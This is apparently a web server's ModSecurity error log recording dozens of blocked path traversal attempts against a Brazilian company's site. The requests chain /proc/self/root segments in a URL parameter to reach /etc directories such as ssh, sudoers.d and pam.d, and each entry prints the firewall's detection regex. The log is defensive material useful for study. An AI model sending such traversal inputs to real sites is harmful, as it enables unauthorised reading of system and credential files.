[Wed Mar 18 08:29:04.496042 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:34726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMgAkwaGbbGflqUZD48AAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:10.263224 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:49524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMhta6ubjKNq_cu4aAaQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:11.563316 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:45604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMh-oXxyEfFpUF8f9W8wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:13.183366 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:45614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMicdf6f5d65gmYZS8MQAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:14.489223 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:45626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMikzinOy1jxa1j4f7SAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:15.827313 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:45636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMi-oXxyEfFpUF8f9W-gAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:17.387072 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:45638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMjeyqAr6etmhZHNqmBAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:18.735092 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:45648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMjuw_le52K8_3pV3IogAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:20.009156 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:46954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMkCmAPhZkrhU8w4lVkwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:21.363169 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:46966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMkfu8EFLIOrSqIpvtiAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:24.058971 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:46968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMlAkwaGbbGflqUZD48wAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:25.454710 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:46982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMlew_le52K8_3pV3IsgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:26.758974 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:46998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMlimAPhZkrhU8w4lVlQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:28.215268 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:47010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMmPu8EFLIOrSqIpvtjAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:29.634849 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:53136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMmcdf6f5d65gmYZS8RAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:34.732463 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:53150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMnuw_le52K8_3pV3IvgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:36.106927 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:53158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMoNa6ubjKNq_cu4aAiQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:37.551489 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:53166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMoeoXxyEfFpUF8f9XAAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:38.839142 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:53182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMovu8EFLIOrSqIpvtlQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:39.426538 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:51588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMo-yqAr6etmhZHNqmGQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:29:43.267173 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:35774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMp-yqAr6etmhZHNqmIAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:44.659180 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:35784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMqEzinOy1jxa1j4f7WgAAAQo"], referer: 